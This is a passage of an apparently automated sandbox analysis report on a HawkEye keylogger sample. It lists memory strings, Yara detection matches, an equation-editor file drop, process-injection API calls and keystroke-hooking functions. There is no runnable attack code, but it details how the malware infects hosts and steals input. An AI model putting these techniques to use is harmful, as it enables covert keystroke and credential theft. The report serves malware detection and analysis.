            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
            Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
            Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
            Source: name.exe, 00000004.00000002.2141909608.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
            Source: name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
            Source: name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2374162693.00000000081A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2180304316.00000000028B0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: vbc.exeString found in binary or memory: http://www.nirsoft.net/
            Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
            Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
            Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
            Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Contains functionality to log keystrokes (.Net Source)Show sources
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large array initializationsShow sources
            Source: 4.2.name.exe.30000.0.unpack, g4K/Dj6.csLarge array initialization: .cctor: array initializer size 4259
            Source: 4.2.name.exe.30000.0.unpack, k0N/Ee6.csLarge array initialization: .cctor: array initializer size 4998
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\name.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\name.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\name.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A8598 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A8580 NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A85A4 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001ADA88 NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001AE018 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A85BC NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A85B0 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A8670 NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A8694 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A8688 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A86AC NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A86A0 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001ADF60 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E3668 CreateProcessAsUserW,
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00037A33
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00348BB7
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00347439
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00349460
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00349450
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00347448
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_0034AAD0
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_0034AAC0
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00341C9A
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E44F9
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E5821
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E9939
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E2D31
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E72E2
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E7A10
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E3A00
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009EC228
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E8C98
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E8C88
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009EB0E0
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E0006
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E0048
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E9110
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E9100
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009ECE58
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009E1268
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_009EA3E8
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_012420B0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A9418
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A9D00
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001AAD40
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A72A0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001ABB30
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A7B70
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001AAD2F
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001AC171
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A25AB
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 5_2_001A6F58
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404DDB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040BD8A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404E4C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404EBD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404F4E
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00404419
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00404516
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00413538
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004145A1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0040E639
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004337AF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004399B1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0043DAE7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00405CF6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00403F85
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411F99
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\InstallUtil.exe 815FD29D891CB94418BB0CDC44D5095230989FE9DA58421319FCD57E458E39A9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
            Source: 5.2.InstallUtil.exe.5e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.4e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
